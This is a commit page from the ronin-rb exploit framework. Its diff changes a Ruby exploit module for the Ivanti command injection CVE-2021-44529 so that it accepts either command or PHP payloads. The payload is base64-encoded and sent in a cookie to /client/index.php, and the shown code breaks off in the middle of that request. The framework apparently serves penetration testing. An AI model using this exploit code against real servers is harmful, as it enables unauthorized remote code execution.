Allow ivanti/CVE-2021-44529 to use either Command or PHP payloads.

* Requires `ronin-payloads` >= 0.3.0 and `ronin-exploits` >= 1.2.0.
ronin-rb · Aug 20, 2024 · daece79 · daece79
1 parent febceb3
commit daece79
Showing 1 changed file with 11 additions and 2 deletions.
diff --git a/exploits/ivanti/CVE-2021-44529.rb b/exploits/ivanti/CVE-2021-44529.rb
@@ -5,6 +5,9 @@
 require 'ronin/support/encoding/base64'
 require 'ronin/support/encoding/ruby'
 
+require 'ronin/payloads/command_payload'
+require 'ronin/payloads/php_payload'
+
 module Ronin
   module Exploits
     #
@@ -46,14 +49,20 @@ class CVE_2021_44529 < CommandInjection
         "https://github.com/jkana/CVE-2021-44529"
       ]
 
+      payload_class Payloads::CommandPayload, Payloads::PHPPayload
+
       #
       # Sends a HTTP GET request to `/client/index.php` with the `c` cookie
       # parameter containing the base64 encoded string `system(COMMAND);` with
       # the double-quoted command string inside of `system(...);` function call.
       #
       def launch
-        wrapped_payload = "system(#{payload.to_s.inspect});"
-        encoded_payload = wrapped_payload.base64_encode(mode: :url_safe)
+        php_payload = case @payload
+                      when Payloads::CommandPayload then payload.to_php
+                      else                               payload.to_s
+                      end
+
+        encoded_payload = php_payload.base64_encode(mode: :url_safe)
 
         response = http_get(
           '/client/index.php', cookie: {